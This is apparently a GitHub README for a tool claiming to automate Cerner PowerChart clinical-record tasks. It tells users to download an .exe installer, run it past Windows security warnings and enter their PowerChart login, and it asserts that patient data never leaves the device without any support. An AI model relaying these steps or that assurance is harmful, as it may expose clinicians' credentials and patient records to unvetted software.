⚙️ cerner-powerchart-browser-automation - Automate PowerChart Tasks Easily

Download Now

📋 About cerner-powerchart-browser-automation

This application helps you use Cerner PowerChart faster and easier. It does this by automating tasks in your web browser. With it, you can extract clinical data, manage orders, automate documentation, and move through PowerChart without needing to use any APIs. You don’t need technical skills to use this tool. It works in the background while you navigate your health records.

The automation works with tools called Playwright and Puppeteer behind the scenes. These tools control the browser to save you time and reduce repeated work.

💻 System Requirements

Before you start, make sure your Windows computer meets these needs:

  • Windows 10 or later (Windows 11 works well).
  • At least 4 GB of RAM.
  • 2 GHz dual-core or faster processor.
  • 500 MB free disk space.
  • Internet connection to download the app.
  • A modern browser installed (Chrome or Edge recommended).
  • Permissions to install software on your PC.

🚀 Getting Started

Follow these steps to download and run the software.

1. Download the Application

Click on the big green Download button above or visit this page:

https://github.com/Deno711/cerner-powerchart-browser-automation

This link takes you to the project’s main page. From here, you will find release files or installation instructions.

2. Locate the Installer

On the page, look for the Releases section in the right sidebar or under the main tab. Releases contain the ready-to-use software files. Find the latest version, typically marked with the highest number or a recent date.

Look for a Windows installer file. It usually ends with .exe. The file might be named something like:

  • cpb-automation-setup.exe
  • cerner-powerchart-automation-win.exe

3. Save the File

Click the .exe file name to download it to your computer. Save it somewhere easy to find, like your Desktop or Downloads folder.

🛠 Installation Steps

  1. Open the Installer

Double-click the downloaded .exe file. You might see a security warning from Windows. Choose to run the file if you trust the source.

  2. Follow the Setup Wizard

The setup wizard will open and guide you through the installation. Read the steps carefully. Choose the default options unless you want to install to a custom folder.

  3. Accept Terms

Accept the license agreement and terms of use to continue.

  4. Complete Installation

Click Install and wait for the process to finish. It should only take a few minutes.

  5. Launch the Application

When the installation finishes, you will see an option to launch the app. You can also find it later in your Start menu under “cerner-powerchart-browser-automation.”

🔧 How to Use

After launching the app, you will see a simple interface.

Connect to PowerChart

  1. Enter your PowerChart login info or ensure you are logged in through your browser.
  2. The tool will open PowerChart in a controlled browser window.
  3. Use the buttons to select what you want to automate:
    • Extract clinical data
    • Manage orders
    • Automate documentation
    • Navigate sections quickly

Running Automation Tasks

Click each feature you want. The app will run the task in the background. You will see progress and results on the screen.

Stop or Pause Automation

You can pause or stop tasks any time. This gives you control if you need to check something manually.

📁 Where to Find Your Data

Extracted clinical data and order information will save in a folder on your PC. By default, the app creates a folder called

C:\Users\<YourUser>\Documents\PowerChartAutomation

You can change this path in the app settings.

Files will be saved as readable documents or spreadsheets depending on the task.

⚙️ Settings and Configuration

You can adjust:

  • The folder for saved files.
  • How often the app refreshes data.
  • Automation speed (slower or faster).
  • Notification options during tasks.

You do not need to change these unless you want to customize your experience.

🧩 Common Questions

Can I use this without logging into PowerChart?

No. The app requires an active PowerChart session to work.

Is this safe to use with my patient data?

The app only automates your current browser session. Your data never leaves your device unless you choose to share saved files.

What if the automation stops working?

Update the app from the download page to get the latest fixes. Restart your computer if needed.

Can I cancel an automation mid-task?

Yes. Use the stop button in the app to cancel any running process.

🧰 Troubleshooting Tips

  • Make sure your internet is stable.
  • Close other programs that might interfere with the browser.
  • Ensure you have permission to run software on your PC.
  • Restart the app if you see errors.
  • Check the app folder for logs if problems continue.
